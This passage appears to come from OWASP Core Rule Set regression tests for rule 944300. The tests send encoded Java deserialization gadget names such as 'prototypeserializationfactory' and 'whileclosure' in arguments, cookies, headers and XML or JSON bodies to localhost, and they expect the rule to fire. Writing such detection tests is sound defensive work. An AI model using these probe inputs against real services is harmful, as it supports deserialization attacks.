desc: "XML attribute value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-282 + desc: "XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-283 + desc: "Nested XML element value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-284 + desc: "Content-Type text/plain includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-285 + desc: "Content-Type application/json arg value includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-286 + desc: "Content-Type application/json arg name includes keyword HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb3RvdHlwZXNlcmlhbGl6YXRpb25mYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-287 + desc: "Argument test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-288 + desc: "Argument name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-289 + desc: "Cookie test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-290 + desc: "Cookie name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-291 + desc: "Request header test includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-292 + desc: "XML attribute value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-293 + desc: "XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-294 + desc: "Nested XML element value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-295 + desc: "Content-Type text/plain includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-296 + desc: "Content-Type application/json arg value includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-297 + desc: "Content-Type application/json arg name includes keyword Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm90b3R5cGVzZXJpYWxpemF0aW9uZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-298 + desc: "Argument test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-299 + desc: "Argument name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-300 + desc: "Cookie test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-301 + desc: "Cookie name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: d2hpbGVjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-302 + desc: "Request header test includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: d2hpbGVjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-303 + desc: "XML attribute value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-304 + desc: "XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-305 + desc: "Nested XML element value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-306 + desc: "Content-Type text/plain includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=d2hpbGVjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-307 + desc: "Content-Type application/json arg value includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"d2hpbGVjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-308 + desc: "Content-Type application/json arg name includes keyword d2hpbGVjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"d2hpbGVjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-309 + desc: "Argument test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-310 + desc: "Argument name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-311 + desc: "Cookie test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-312 + desc: "Cookie name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HdoaWxlY2xvc3VyZQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-313 + desc: "Request header test includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HdoaWxlY2xvc3VyZQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-314 + desc: "XML attribute value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-315 + desc: "XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-316 + desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-317 + desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-318 + desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-319 + desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-320 + desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-321 + desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-322 + desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-323 + desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-324 + desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-325 + desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-326 + desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-327 + desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-328 + desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-329 + desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: 